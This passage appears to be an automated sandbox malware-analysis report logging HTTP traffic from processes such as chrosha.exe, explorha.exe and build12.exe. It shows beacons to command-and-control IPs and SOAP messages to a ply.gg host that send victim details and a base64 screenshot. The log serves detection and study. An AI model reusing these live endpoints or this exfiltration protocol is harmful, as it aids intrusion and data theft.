                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.993130922 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      156192.168.2.549995193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.962435007 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.211004972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.215601921 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.469396114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      157192.168.2.549997147.185.221.19309467324C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.291428089 CEST228OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95722
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.955063105 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95722
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqY
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.224847078 CEST294INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.531841993 CEST294INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      158192.168.2.549998147.185.221.19309465608C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.297364950 CEST228OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95721
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.954663992 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95721
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqY
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.224087954 CEST294INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.531725883 CEST294INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 147
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      159192.168.2.549996193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.351089001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.597203970 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      160192.168.2.549999193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.819822073 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.068232059 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.100039005 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.353152990 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
